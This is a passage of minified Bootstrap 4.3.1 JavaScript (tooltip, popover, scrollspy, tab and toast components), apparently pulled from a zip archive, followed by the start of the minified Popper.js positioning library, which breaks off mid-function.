e=this;if("none"===g(this.element).css("display"))throw new Error("Please use show on visible elements");var t=g.Event(this.constructor.Event.SHOW);if(this.isWithContent()&&this._isEnabled){g(this.element).trigger(t);var n=_.findShadowRoot(this.element),i=g.contains(null!==n?n:this.element.ownerDocument.documentElement,this.element);if(t.isDefaultPrevented()||!i)return;var o=this.getTipElement(),r=_.getUID(this.constructor.NAME);o.setAttribute("id",r),this.element.setAttribute("aria-describedby",r),this.setContent(),this.config.animation&&g(o).addClass(xe);var s="function"==typeof this.config.placement?this.config.placement.call(this,o,this.element):this.config.placement,a=this._getAttachment(s);this.addAttachmentClass(a);var l=this._getContainer();g(o).data(this.constructor.DATA_KEY,this),g.contains(this.element.ownerDocument.documentElement,this.tip)||g(o).appendTo(l),g(this.element).trigger(this.constructor.Event.INSERTED),this._popper=new u(this.element,o,{placement:a,modifiers:{offset:this._getOffset(),flip:{behavior:this.config.fallbackPlacement},arrow:{element:We},preventOverflow:{boundariesElement:this.config.boundary}},onCreate:function(t){t.originalPlacement!==t.placement&&e._handlePopperPlacementChange(t)},onUpdate:function(t){return e._handlePopperPlacementChange(t)}}),g(o).addClass(Fe),"ontouchstart"in document.documentElement&&g(document.body).children().on("mouseover",null,g.noop);var c=function(){e.config.animation&&e._fixTransition();var t=e._hoverState;e._hoverState=null,g(e.element).trigger(e.constructor.Event.SHOWN),t===He&&e._leave(null,e)};if(g(this.tip).hasClass(xe)){var h=_.getTransitionDurationFromElement(this.tip);g(this.tip).one(_.TRANSITION_END,c).emulateTransitionEnd(h)}else c()}},t.hide=function(t){var e=this,n=this.getTipElement(),i=g.Event(this.constructor.Event.HIDE),o=function(){e._hoverState!==je&&n.parentNode&&n.parentNode.removeChild(n),e._cleanTipClass(),e.element.removeAttribute("aria-describedby"),g(e.element).trigger(e.constructor.Event.HIDDEN),null!==e._popper&&e._popper.destroy(),t&&t()};if(g(this.element).trigger(i),!i.isDefaultPrevented()){if(g(n).removeClass(Fe),"ontouchstart"in document.documentElement&&g(document.body).children().off("mouseover",null,g.noop),this._activeTrigger[Ke]=!1,this._activeTrigger[Me]=!1,this._activeTrigger[qe]=!1,g(this.tip).hasClass(xe)){var r=_.getTransitionDurationFromElement(n);g(n).one(_.TRANSITION_END,o).emulateTransitionEnd(r)}else o();this._hoverState=""}},t.update=function(){null!==this._popper&&this._popper.scheduleUpdate()},t.isWithContent=function(){return Boolean(this.getTitle())},t.addAttachmentClass=function(t){g(this.getTipElement()).addClass(Ae+"-"+t)},t.getTipElement=function(){return this.tip=this.tip||g(this.config.template)[0],this.tip},t.setContent=function(){var t=this.getTipElement();this.setElementContent(g(t.querySelectorAll(Ue)),this.getTitle()),g(t).removeClass(xe+" "+Fe)},t.setElementContent=function(t,e){"object"!=typeof e||!e.nodeType&&!e.jquery?this.config.html?(this.config.sanitize&&(e=Se(e,this.config.whiteList,this.config.sanitizeFn)),t.html(e)):t.text(e):this.config.html?g(e).parent().is(t)||t.empty().append(e):t.text(g(e).text())},t.getTitle=function(){var t=this.element.getAttribute("data-original-title");return t||(t="function"==typeof this.config.title?this.config.title.call(this.element):this.config.title),t},t._getOffset=function(){var e=this,t={};return"function"==typeof this.config.offset?t.fn=function(t){return t.offsets=l({},t.offsets,e.config.offset(t.offsets,e.element)||{}),t}:t.offset=this.config.offset,t},t._getContainer=function(){return!1===this.config.container?document.body:_.isElement(this.config.container)?g(this.config.container):g(document).find(this.config.container)},t._getAttachment=function(t){return Pe[t.toUpperCase()]},t._setListeners=function(){var i=this;this.config.trigger.split(" ").forEach(function(t){if("click"===t)g(i.element).on(i.constructor.Event.CLICK,i.config.selector,function(t){return i.toggle(t)});else if(t!==Qe){var e=t===qe?i.constructor.Event.MOUSEENTER:i.constructor.Event.FOCUSIN,n=t===qe?i.constructor.Event.MOUSELEAVE:i.constructor.Event.FOCUSOUT;g(i.element).on(e,i.config.selector,function(t){return i._enter(t)}).on(n,i.config.selector,function(t){return i._leave(t)})}}),g(this.element).closest(".modal").on("hide.bs.modal",function(){i.element&&i.hide()}),this.config.selector?this.config=l({},this.config,{trigger:"manual",selector:""}):this._fixTitle()},t._fixTitle=function(){var t=typeof this.element.getAttribute("data-original-title");(this.element.getAttribute("title")||"string"!==t)&&(this.element.setAttribute("data-original-title",this.element.getAttribute("title")||""),this.element.setAttribute("title",""))},t._enter=function(t,e){var n=this.constructor.DATA_KEY;(e=e||g(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),g(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusin"===t.type?Me:qe]=!0),g(e.getTipElement()).hasClass(Fe)||e._hoverState===je?e._hoverState=je:(clearTimeout(e._timeout),e._hoverState=je,e.config.delay&&e.config.delay.show?e._timeout=setTimeout(function(){e._hoverState===je&&e.show()},e.config.delay.show):e.show())},t._leave=function(t,e){var n=this.constructor.DATA_KEY;(e=e||g(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),g(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusout"===t.type?Me:qe]=!1),e._isWithActiveTrigger()||(clearTimeout(e._timeout),e._hoverState=He,e.config.delay&&e.config.delay.hide?e._timeout=setTimeout(function(){e._hoverState===He&&e.hide()},e.config.delay.hide):e.hide())},t._isWithActiveTrigger=function(){for(var t in this._activeTrigger)if(this._activeTrigger[t])return!0;return!1},t._getConfig=function(t){var e=g(this.element).data();return Object.keys(e).forEach(function(t){-1!==Oe.indexOf(t)&&delete e[t]}),"number"==typeof(t=l({},this.constructor.Default,e,"object"==typeof t&&t?t:{})).delay&&(t.delay={show:t.delay,hide:t.delay}),"number"==typeof t.title&&(t.title=t.title.toString()),"number"==typeof t.content&&(t.content=t.content.toString()),_.typeCheckConfig(be,t,this.constructor.DefaultType),t.sanitize&&(t.template=Se(t.template,t.whiteList,t.sanitizeFn)),t},t._getDelegateConfig=function(){var t={};if(this.config)for(var e in this.config)this.constructor.Default[e]!==this.config[e]&&(t[e]=this.config[e]);return t},t._cleanTipClass=function(){var t=g(this.getTipElement()),e=t.attr("class").match(Ne);null!==e&&e.length&&t.removeClass(e.join(""))},t._handlePopperPlacementChange=function(t){var e=t.instance;this.tip=e.popper,this._cleanTipClass(),this.addAttachmentClass(this._getAttachment(t.placement))},t._fixTransition=function(){var t=this.getTipElement(),e=this.config.animation;null===t.getAttribute("x-placement")&&(g(t).removeClass(xe),this.config.animation=!1,this.hide(),this.show(),this.config.animation=e)},i._jQueryInterface=function(n){return this.each(function(){var t=g(this).data(Ie),e="object"==typeof n&&n;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),g(this).data(Ie,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return Le}},{key:"NAME",get:function(){return be}},{key:"DATA_KEY",get:function(){return Ie}},{key:"Event",get:function(){return Re}},{key:"EVENT_KEY",get:function(){return De}},{key:"DefaultType",get:function(){return ke}}]),i}();g.fn[be]=Be._jQueryInterface,g.fn[be].Constructor=Be,g.fn[be].noConflict=function(){return g.fn[be]=we,Be._jQueryInterface};var Ve="popover",Ye="bs.popover",ze="."+Ye,Xe=g.fn[Ve],$e="bs-popover",Ge=new RegExp("(^|\\s)"+$e+"\\S+","g"),Je=l({},Be.Default,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-header"></h3><div class="popover-body"></div></div>'}),Ze=l({},Be.DefaultType,{content:"(string|element|function)"}),tn="fade",en="show",nn=".popover-header",on=".popover-body",rn={HIDE:"hide"+ze,HIDDEN:"hidden"+ze,SHOW:"show"+ze,SHOWN:"shown"+ze,INSERTED:"inserted"+ze,CLICK:"click"+ze,FOCUSIN:"focusin"+ze,FOCUSOUT:"focusout"+ze,MOUSEENTER:"mouseenter"+ze,MOUSELEAVE:"mouseleave"+ze},sn=function(t){var e,n;function i(){return t.apply(this,arguments)||this}n=t,(e=i).prototype=Object.create(n.prototype),(e.prototype.constructor=e).__proto__=n;var o=i.prototype;return o.isWithContent=function(){return this.getTitle()||this._getContent()},o.addAttachmentClass=function(t){g(this.getTipElement()).addClass($e+"-"+t)},o.getTipElement=function(){return this.tip=this.tip||g(this.config.template)[0],this.tip},o.setContent=function(){var t=g(this.getTipElement());this.setElementContent(t.find(nn),this.getTitle());var e=this._getContent();"function"==typeof e&&(e=e.call(this.element)),this.setElementContent(t.find(on),e),t.removeClass(tn+" "+en)},o._getContent=function(){return this.element.getAttribute("data-content")||this.config.content},o._cleanTipClass=function(){var t=g(this.getTipElement()),e=t.attr("class").match(Ge);null!==e&&0<e.length&&t.removeClass(e.join(""))},i._jQueryInterface=function(n){return this.each(function(){var t=g(this).data(Ye),e="object"==typeof n?n:null;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),g(this).data(Ye,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return Je}},{key:"NAME",get:function(){return Ve}},{key:"DATA_KEY",get:function(){return Ye}},{key:"Event",get:function(){return rn}},{key:"EVENT_KEY",get:function(){return ze}},{key:"DefaultType",get:function(){return Ze}}]),i}(Be);g.fn[Ve]=sn._jQueryInterface,g.fn[Ve].Constructor=sn,g.fn[Ve].noConflict=function(){return g.fn[Ve]=Xe,sn._jQueryInterface};var an="scrollspy",ln="bs.scrollspy",cn="."+ln,hn=g.fn[an],un={offset:10,method:"auto",target:""},fn={offset:"number",method:"string",target:"(string|element)"},dn={ACTIVATE:"activate"+cn,SCROLL:"scroll"+cn,LOAD_DATA_API:"load"+cn+".data-api"},gn="dropdown-item",_n="active",mn='[data-spy="scroll"]',pn=".nav, .list-group",vn=".nav-link",yn=".nav-item",En=".list-group-item",Cn=".dropdown",Tn=".dropdown-item",Sn=".dropdown-toggle",bn="offset",In="position",Dn=function(){function n(t,e){var n=this;this._element=t,this._scrollElement="BODY"===t.tagName?window:t,this._config=this._getConfig(e),this._selector=this._config.target+" "+vn+","+this._config.target+" "+En+","+this._config.target+" "+Tn,this._offsets=[],this._targets=[],this._activeTarget=null,this._scrollHeight=0,g(this._scrollElement).on(dn.SCROLL,function(t){return n._process(t)}),this.refresh(),this._process()}var t=n.prototype;return t.refresh=function(){var e=this,t=this._scrollElement===this._scrollElement.window?bn:In,o="auto"===this._config.method?t:this._config.method,r=o===In?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight(),[].slice.call(document.querySelectorAll(this._selector)).map(function(t){var e,n=_.getSelectorFromElement(t);if(n&&(e=document.querySelector(n)),e){var i=e.getBoundingClientRect();if(i.width||i.height)return[g(e)[o]().top+r,n]}return null}).filter(function(t){return t}).sort(function(t,e){return t[0]-e[0]}).forEach(function(t){e._offsets.push(t[0]),e._targets.push(t[1])})},t.dispose=function(){g.removeData(this._element,ln),g(this._scrollElement).off(cn),this._element=null,this._scrollElement=null,this._config=null,this._selector=null,this._offsets=null,this._targets=null,this._activeTarget=null,this._scrollHeight=null},t._getConfig=function(t){if("string"!=typeof(t=l({},un,"object"==typeof t&&t?t:{})).target){var e=g(t.target).attr("id");e||(e=_.getUID(an),g(t.target).attr("id",e)),t.target="#"+e}return _.typeCheckConfig(an,t,fn),t},t._getScrollTop=function(){return this._scrollElement===window?this._scrollElement.pageYOffset:this._scrollElement.scrollTop},t._getScrollHeight=function(){return this._scrollElement.scrollHeight||Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)},t._getOffsetHeight=function(){return this._scrollElement===window?window.innerHeight:this._scrollElement.getBoundingClientRect().height},t._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._getScrollHeight(),n=this._config.offset+e-this._getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),n<=t){var i=this._targets[this._targets.length-1];this._activeTarget!==i&&this._activate(i)}else{if(this._activeTarget&&t<this._offsets[0]&&0<this._offsets[0])return this._activeTarget=null,void this._clear();for(var o=this._offsets.length;o--;){this._activeTarget!==this._targets[o]&&t>=this._offsets[o]&&("undefined"==typeof this._offsets[o+1]||t<this._offsets[o+1])&&this._activate(this._targets[o])}}},t._activate=function(e){this._activeTarget=e,this._clear();var t=this._selector.split(",").map(function(t){return t+'[data-target="'+e+'"],'+t+'[href="'+e+'"]'}),n=g([].slice.call(document.querySelectorAll(t.join(","))));n.hasClass(gn)?(n.closest(Cn).find(Sn).addClass(_n),n.addClass(_n)):(n.addClass(_n),n.parents(pn).prev(vn+", "+En).addClass(_n),n.parents(pn).prev(yn).children(vn).addClass(_n)),g(this._scrollElement).trigger(dn.ACTIVATE,{relatedTarget:e})},t._clear=function(){[].slice.call(document.querySelectorAll(this._selector)).filter(function(t){return t.classList.contains(_n)}).forEach(function(t){return t.classList.remove(_n)})},n._jQueryInterface=function(e){return this.each(function(){var t=g(this).data(ln);if(t||(t=new n(this,"object"==typeof e&&e),g(this).data(ln,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},s(n,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"Default",get:function(){return un}}]),n}();g(window).on(dn.LOAD_DATA_API,function(){for(var t=[].slice.call(document.querySelectorAll(mn)),e=t.length;e--;){var n=g(t[e]);Dn._jQueryInterface.call(n,n.data())}}),g.fn[an]=Dn._jQueryInterface,g.fn[an].Constructor=Dn,g.fn[an].noConflict=function(){return g.fn[an]=hn,Dn._jQueryInterface};var wn="bs.tab",An="."+wn,Nn=g.fn.tab,On={HIDE:"hide"+An,HIDDEN:"hidden"+An,SHOW:"show"+An,SHOWN:"shown"+An,CLICK_DATA_API:"click"+An+".data-api"},kn="dropdown-menu",Pn="active",Ln="disabled",jn="fade",Hn="show",Rn=".dropdown",xn=".nav, .list-group",Fn=".active",Un="> li > .active",Wn='[data-toggle="tab"], [data-toggle="pill"], [data-toggle="list"]',qn=".dropdown-toggle",Mn="> .dropdown-menu .active",Kn=function(){function i(t){this._element=t}var t=i.prototype;return t.show=function(){var n=this;if(!(this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE&&g(this._element).hasClass(Pn)||g(this._element).hasClass(Ln))){var t,i,e=g(this._element).closest(xn)[0],o=_.getSelectorFromElement(this._element);if(e){var r="UL"===e.nodeName||"OL"===e.nodeName?Un:Fn;i=(i=g.makeArray(g(e).find(r)))[i.length-1]}var s=g.Event(On.HIDE,{relatedTarget:this._element}),a=g.Event(On.SHOW,{relatedTarget:i});if(i&&g(i).trigger(s),g(this._element).trigger(a),!a.isDefaultPrevented()&&!s.isDefaultPrevented()){o&&(t=document.querySelector(o)),this._activate(this._element,e);var l=function(){var t=g.Event(On.HIDDEN,{relatedTarget:n._element}),e=g.Event(On.SHOWN,{relatedTarget:i});g(i).trigger(t),g(n._element).trigger(e)};t?this._activate(t,t.parentNode,l):l()}}},t.dispose=function(){g.removeData(this._element,wn),this._element=null},t._activate=function(t,e,n){var i=this,o=(!e||"UL"!==e.nodeName&&"OL"!==e.nodeName?g(e).children(Fn):g(e).find(Un))[0],r=n&&o&&g(o).hasClass(jn),s=function(){return i._transitionComplete(t,o,n)};if(o&&r){var a=_.getTransitionDurationFromElement(o);g(o).removeClass(Hn).one(_.TRANSITION_END,s).emulateTransitionEnd(a)}else s()},t._transitionComplete=function(t,e,n){if(e){g(e).removeClass(Pn);var i=g(e.parentNode).find(Mn)[0];i&&g(i).removeClass(Pn),"tab"===e.getAttribute("role")&&e.setAttribute("aria-selected",!1)}if(g(t).addClass(Pn),"tab"===t.getAttribute("role")&&t.setAttribute("aria-selected",!0),_.reflow(t),t.classList.contains(jn)&&t.classList.add(Hn),t.parentNode&&g(t.parentNode).hasClass(kn)){var o=g(t).closest(Rn)[0];if(o){var r=[].slice.call(o.querySelectorAll(qn));g(r).addClass(Pn)}t.setAttribute("aria-expanded",!0)}n&&n()},i._jQueryInterface=function(n){return this.each(function(){var t=g(this),e=t.data(wn);if(e||(e=new i(this),t.data(wn,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.3.1"}}]),i}();g(document).on(On.CLICK_DATA_API,Wn,function(t){t.preventDefault(),Kn._jQueryInterface.call(g(this),"show")}),g.fn.tab=Kn._jQueryInterface,g.fn.tab.Constructor=Kn,g.fn.tab.noConflict=function(){return g.fn.tab=Nn,Kn._jQueryInterface};var Qn="toast",Bn="bs.toast",Vn="."+Bn,Yn=g.fn[Qn],zn={CLICK_DISMISS:"click.dismiss"+Vn,HIDE:"hide"+Vn,HIDDEN:"hidden"+Vn,SHOW:"show"+Vn,SHOWN:"shown"+Vn},Xn="fade",$n="hide",Gn="show",Jn="showing",Zn={animation:"boolean",autohide:"boolean",delay:"number"},ti={animation:!0,autohide:!0,delay:500},ei='[data-dismiss="toast"]',ni=function(){function i(t,e){this._element=t,this._config=this._getConfig(e),this._timeout=null,this._setListeners()}var t=i.prototype;return t.show=function(){var t=this;g(this._element).trigger(zn.SHOW),this._config.animation&&this._element.classList.add(Xn);var e=function(){t._element.classList.remove(Jn),t._element.classList.add(Gn),g(t._element).trigger(zn.SHOWN),t._config.autohide&&t.hide()};if(this._element.classList.remove($n),this._element.classList.add(Jn),this._config.animation){var n=_.getTransitionDurationFromElement(this._element);g(this._element).one(_.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},t.hide=function(t){var e=this;this._element.classList.contains(Gn)&&(g(this._element).trigger(zn.HIDE),t?this._close():this._timeout=setTimeout(function(){e._close()},this._config.delay))},t.dispose=function(){clearTimeout(this._timeout),this._timeout=null,this._element.classList.contains(Gn)&&this._element.classList.remove(Gn),g(this._element).off(zn.CLICK_DISMISS),g.removeData(this._element,Bn),this._element=null,this._config=null},t._getConfig=function(t){return t=l({},ti,g(this._element).data(),"object"==typeof t&&t?t:{}),_.typeCheckConfig(Qn,t,this.constructor.DefaultType),t},t._setListeners=function(){var t=this;g(this._element).on(zn.CLICK_DISMISS,ei,function(){return t.hide(!0)})},t._close=function(){var t=this,e=function(){t._element.classList.add($n),g(t._element).trigger(zn.HIDDEN)};if(this._element.classList.remove(Gn),this._config.animation){var n=_.getTransitionDurationFromElement(this._element);g(this._element).one(_.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},i._jQueryInterface=function(n){return this.each(function(){var t=g(this),e=t.data(Bn);if(e||(e=new i(this,"object"==typeof n&&n),t.data(Bn,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n](this)}})},s(i,null,[{key:"VERSION",get:function(){return"4.3.1"}},{key:"DefaultType",get:function(){return Zn}},{key:"Default",get:function(){return ti}}]),i}();g.fn[Qn]=ni._jQueryInterface,g.fn[Qn].Constructor=ni,g.fn[Qn].noConflict=function(){return g.fn[Qn]=Yn,ni._jQueryInterface},function(){if("undefined"==typeof g)throw new TypeError("Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.");var t=g.fn.jquery.split(" ")[0].split(".");if(t[0]<2&&t[1]<9||1===t[0]&&9===t[1]&&t[2]<1||4<=t[0])throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}(),t.Util=_,t.Alert=p,t.Button=P,t.Carousel=lt,t.Collapse=bt,t.Dropdown=Jt,t.Modal=ve,t.Popover=sn,t.Scrollspy=Dn,t.Tab=Kn,t.Toast=ni,t.Tooltip=Be,Object.defineProperty(t,"__esModule",{value:!0})});
//# sourceMappingURL=bootstrap.min.js.mapPK!��(�J�Jbootstrap/js/popper.min.jsnu&1i�/*
 Copyright (C) Federico Zivolo 2017
 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).
 */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}function p(e){var t=e.nodeName;return'BODY'!==t&&('HTML'===t||r(e.firstElementChild)===e)}function s(e){return null===e.parentNode?e:s(e.parentNode)}function d(e,t){if(!e||!e.nodeType||!t||!t.nodeType)return document.documentElement;var o=e.compareDocumentPosition(t)&Node.DOCUMENT_POSITION_FOLLOWING,i=o?e:t,n=o?t:e,a=document.createRange();a.setStart(i,0),a.setEnd(n,0);var l=a.commonAncestorContainer;if(e!==l&&t!==l||i.contains(n))return p(l)?l:r(l);var f=s(e);return f.host?d(f.host,t):d(e,s(t).host)}function a(e){var t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:'top',o='top'===t?'scrollTop':'scrollLeft',i=e.nodeName;if('BODY'===i||'HTML'===i){var n=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement||n;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+o+'Width'],10)+parseFloat(e['border'+i+'Width'],10)}function m(e,t,o,i){return J(t['offset'+e],t['scroll'+e],o['client'+e],o['offset'+e],o['scroll'+e],ie()?o['offset'+e]+i['margin'+('Height'===e?'Top':'Left')]+i['margin'+('Height'===e?'Bottom':'Right')]:0)}function h(){var e=document.body,t=document.documentElement,o=ie()&&getComputedStyle(t);return{height:m('Height',e,t,o),width:m('Width',e,t,o)}}function c(e){return se({},e,{right:e.left+e.width,bottom:e.top+e.height})}function g(e){var o={};if(ie())try{o=e.getBoundingClientRect();var i=a(e,'top'),n=a(e,'left');o.top+=i,o.left+=n,o.bottom+=i,o.right+=n}catch(e){}else o=e.getBoundingClientRect();var r={left:o.left,top:o.top,width:o.right-o.left,height:o.bottom-o.top},p='HTML'===e.nodeName?h():{},s=p.width||e.clientWidth||r.right-r.left,d=p.height||e.clientHeight||r.bottom-r.top,l=e.offsetWidth-s,m=e.offsetHeight-d;if(l||m){var g=t(e);l-=f(g,'x'),m-=f(g,'y'),r.width-=l,r.height-=m}return c(r)}function u(e,o){var i=ie(),r='HTML'===o.nodeName,p=g(e),s=g(o),d=n(e),a=t(o),f=parseFloat(a.borderTopWidth,10),m=parseFloat(a.borderLeftWidth,10),h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o.contains(d):o===d&&'BODY'!==d.nodeName)&&(h=l(h,o)),h}function b(e){var t=e.ownerDocument.documentElement,o=u(e,t),i=J(t.clientWidth,window.innerWidth||0),n=J(t.clientHeight,window.innerHeight||0),r=a(t),p=a(t,'left'),s={top:r-o.top+o.marginTop,left:p-o.left+o.marginLeft,width:i,height:n};return c(s)}function w(e){var i=e.nodeName;return'BODY'===i||'HTML'===i?!1:'fixed'===t(e,'position')||w(o(e))}function y(e,t,i,r){var p={top:0,left:0},s=d(e,t);if('viewport'===r)p=b(s);else{var a;'scrollParent'===r?(a=n(o(t)),'BODY'===a.nodeName&&(a=e.ownerDocument.documentElement)):'window'===r?a=e.ownerDocument.documentElement:a=r;var l=u(a,s);if('HTML'===a.nodeName&&!w(s)){var f=h(),m=f.height,c=f.width;p.top+=l.top-l.marginTop,p.bottom=m+l.top,p.left+=l.left-l.marginLeft,p.right=c+l.left}else p=l}return p.left+=i,p.top+=i,p.right-=i,p.bottom-=i,p}function E(e){var t=e.width,o=e.height;return t*o}function v(e,t,o,i,n){var r=5<arguments.length&&void 0!==arguments[5]?arguments[5]:0;if(-1===e.indexOf('auto'))return e;var p=y(o,i,r,n),s={top:{width:p.width,height:t.top-p.top},right:{width:p.right-t.right,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,i=e.height;return t>=o.clientWidth&&i>=o.clientHeight}),l=0<a.length?a[0].key:d[0].key,f=e.split('-')[1];return l+(f?'-'+f:'')}function O(e,t,o){var i=d(t,o);return u(o,i)}function L(e){var t=getComputedStyle(e),o=parseFloat(t.marginTop)+parseFloat(t.marginBottom),i=parseFloat(t.marginLeft)+parseFloat(t.marginRight),n={width:e.offsetWidth+i,height:e.offsetHeight+o};return n}function x(e){var t={left:'right',right:'left',bottom:'top',top:'bottom'};return e.replace(/left|right|bottom|top/g,function(e){return t[e]})}function S(e,t,o){o=o.split('-')[0];var i=L(e),n={width:i.width,height:i.height},r=-1!==['right','left'].indexOf(o),p=r?'top':'left',s=r?'left':'top',d=r?'height':'width',a=r?'width':'height';return n[p]=t[p]+t[d]/2-i[d]/2,n[s]=o===s?t[s]-i[a]:t[x(s)],n}function T(e,t){return Array.prototype.find?e.find(t):e.filter(t)[0]}function D(e,t,o){if(Array.prototype.findIndex)return e.findIndex(function(e){return e[t]===o});var i=T(e,function(e){return e[t]===o});return e.indexOf(i)}function C(t,o,i){var n=void 0===i?t:t.slice(0,D(t,'name',i));return n.forEach(function(t){t['function']&&console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instance:this,styles:{},arrowStyles:{},attributes:{},flipped:!1,offsets:{}};e.offsets.reference=O(this.state,this.popper,this.reference),e.placement=v(this.options.placement,e.offsets.reference,this.popper,this.reference,this.options.modifiers.flip.boundariesElement,this.options.modifiers.flip.padding),e.originalPlacement=e.placement,e.offsets.popper=S(this.popper,e.offsets.reference,e.placement),e.offsets.popper.position='absolute',e=C(this.modifiers,e),this.state.isCreated?this.options.onUpdate(e):(this.state.isCreated=!0,this.options.onCreate(e))}}function k(e,t){return e.some(function(e){var o=e.name,i=e.enabled;return i&&o===t})}function W(e){for(var t=[!1,'ms','Webkit','Moz','O'],o=e.charAt(0).toUpperCase()+e.slice(1),n=0;n<t.length-1;n++){var i=t[n],r=i?''+i+o:e;if('undefined'!=typeof document.body.style[r])return r}return null}function P(){return this.state.isDestroyed=!0,k(this.modifiers,'applyStyle')&&(this.popper.removeAttribute('x-placement'),this.popper.style.left='',this.popper.style.position='',this.popper.style.top='',this.popper.style[W('transform')]=''),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!0}),r||H(n(p.parentNode),t,o,i),i.push(p)}function A(e,t,o,i){o.updateBound=i,B(e).addEventListener('resize',o.updateBound,{passive:!0});var r=n(e);return H(r,'scroll',o.updateBound,o.scrollParents),o.scrollElement=r,o.eventsEnabled=!0,o}function I(){this.state.eventsEnabled||(this.state=A(this.reference,this.options,this.state,this.scheduleUpdate))}function M(e,t){return B(e).removeEventListener('resize',t.updateBound),t.scrollParents.forEach(function(e){e.removeEventListener('scroll',t.updateBound)}),t.updateBound=null,t.scrollParents=[],t.scrollElement=null,t.eventsEnabled=!1,t}function R(){this.state.eventsEnabled&&(cancelAnimationFrame(this.scheduleUpdate),this.state=M(this.reference,this.state))}function U(e){return''!==e&&!isNaN(parseFloat(e))&&isFinite(e)}function Y(e,t){Object.keys(t).forEach(function(o){var i='';-1!==['width','height','top','right','bottom','left'].indexOf(o)&&U(t[o])&&(i='px'),e.style[o]=t[o]+i})}function j(e,t){Object.keys(t).forEach(function(o){var i=t[o];!1===i?e.removeAttribute(o):e.setAttribute(o,t[o])})}function F(e,t,o){var i=T(e,function(e){var o=e.name;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){return'end'===e?'start':'start'===e?'end':e}function q(e){var t=1<arguments.length&&void 0!==arguments[1]&&arguments[1],o=ae.indexOf(e),i=ae.slice(o+1).concat(ae.slice(0,o));return t?i.reverse():i}function V(e,t,o,i){var n=e.match(/((?:\-|\+)?\d*\.?\d*)(.*)/),r=+n[1],p=n[2];if(!r)return e;if(0===p.indexOf('%')){var s;switch(p){case'%p':s=o;break;case'%':case'%r':default:s=i;}var d=c(s);return d[t]/100*r}if('vh'===p||'vw'===p){var a;return a='vh'===p?J(document.documentElement.clientHeight,window.innerHeight||0):J(document.documentElement.clientWidth,window.innerWidth||0),a/100*r}return r}function z(e,t,o,i){var 